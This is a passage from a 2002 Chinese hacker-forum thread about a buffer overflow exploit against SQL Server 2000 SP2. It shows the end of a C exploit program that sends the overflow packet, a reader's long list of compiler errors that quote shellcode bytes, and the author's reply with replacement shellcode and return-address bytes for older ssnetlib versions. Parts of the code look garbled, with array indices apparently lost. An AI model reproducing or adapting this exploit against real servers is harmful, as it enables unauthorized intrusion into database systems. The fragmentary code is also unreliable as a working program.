sql server 2000 sp2 12命令的溢出攻击实现.txt

可以对黑客编程有一定的了解

　　　　printf(\"Send failed.Error:%d\\n\",WSAGetLastError());
　　　　return FALSE;
　　}

　　len=recv(sock,buf1,255,NULL);
　　for(i=0;i<len;i++)
　　{
　　　　printf(\"%02x \",buf1[i]);
　　　　if(i%16==15)
　　　　　　printf(\"\\n\");
　　}
　　printf(\"\\n\");
　　buf0[0]=0x10;
　　if (send(sock, buf0, sizeof(buf0), 0)==SOCKET_ERROR)
　　{
　　　　printf(\"Send failed.Error:%d\\n\",WSAGetLastError());
　　　　return FALSE;
　　}
　　WSACleanup();
　　return 0;

}




　哦！我就这些无知的东西，如果你希望你后悔就来吧！　 
闪空家园 


--------------------------------------------------------------------------------


 回应人: youzulin 发表日期: 2002-09-14 11:10:07

不错。我转到我论坛去了。http://hhh4.yeah.net大家有空也来玩玩



--------------------------------------------------------------------------------


 回应人: shensonkind 发表日期: 2002-09-14 11:57:24

编译出现如下错误？：
 
E:\szj\sqlhack\aqlhack.cpp(19) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(19) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(20) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(20) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(22) : error C2117: '\x83\xc4\x81\x8b\xc4\x50\xff\x15\xf8\xe0\xcf\x42"\x33\xc0\x50\xff\x15\x84\xe0\xcf\x42"};' : array bounds overflow
E:\szj\sqlhack\aqlhack.cpp(22) : error C2062: type 'int' unexpected
E:\szj\sqlhack\aqlhack.cpp(32) : error C2065: 'i' : undeclared identifier
E:\szj\sqlhack\aqlhack.cpp(35) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(35) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(36) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(36) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(36) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(36) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(36) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(37) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(37) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(37) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(37) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(37) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(38) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(38) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(38) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(38) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(38) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(39) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(39) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(39) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(39) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(39) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(40) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(40) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(40) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(40) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(40) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(41) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(41) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(41) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(41) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(41) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(42) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(42) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(42) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(42) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(42) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(43) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(43) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(43) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(43) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(43) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(44) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(44) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(44) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(44) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(44) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(45) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(45) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(45) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(45) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(45) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(46) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(46) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(46) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(46) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(46) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(47) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(47) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(47) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(47) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(47) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(48) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(48) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(48) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(48) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(48) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(48) : error C2015: too many characters in constant
E:\szj\sqlhack\aqlhack.cpp(51) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(116) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(116) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(117) : error C2143: syntax error : missing ')' before 'return'
E:\szj\sqlhack\aqlhack.cpp(121) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(121) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(122) : error C2143: syntax error : missing ')' before 'return'
E:\szj\sqlhack\aqlhack.cpp(131) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(131) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(132) : error C2143: syntax error : missing ')' before 'return'
E:\szj\sqlhack\aqlhack.cpp(134) : error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [620]' to 'const char *'
　　　　Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
E:\szj\sqlhack\aqlhack.cpp(136) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(136) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(137) : error C2143: syntax error : missing ')' before 'return'
E:\szj\sqlhack\aqlhack.cpp(140) : error C2664: 'recv' : cannot convert parameter 2 from 'unsigned char [255]' to 'char *'
　　　　Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
E:\szj\sqlhack\aqlhack.cpp(143) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(143) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(144) : error C2143: syntax error : missing ')' before 'if'
E:\szj\sqlhack\aqlhack.cpp(145) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(145) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(146) : error C2143: syntax error : missing ')' before '}'
E:\szj\sqlhack\aqlhack.cpp(147) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(147) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(148) : error C2146: syntax error : missing ')' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(149) : error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [620]' to 'const char *'
　　　　Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
E:\szj\sqlhack\aqlhack.cpp(151) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(151) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(152) : error C2143: syntax error : missing ')' before 'return'
Error executing cl.exe.
sqlhack.exe - 77 error(s), 26 warning(s)




--------------------------------------------------------------------------------


 回应人: flashsky 发表日期: 2002-09-14 15:58:53


做如下修改可以在老的ssnetlib上进行演示
//老版本的演示SHELLCODE
char exploit_code<21>= "\x83\xc4\x81\x8b\xc4\x50\xff\x15\xc0\xf0\xcf\x42"
"\x33\xc0\x50\xff\x15\x8c\xf0\xcf\x42";
buf0=0xfc;
buf0=0x2c;
buf0=0xd0;
buf0=0x42;
buf0=0xfc;
buf0=0x2c;
buf0=0xce;
buf0=0x42;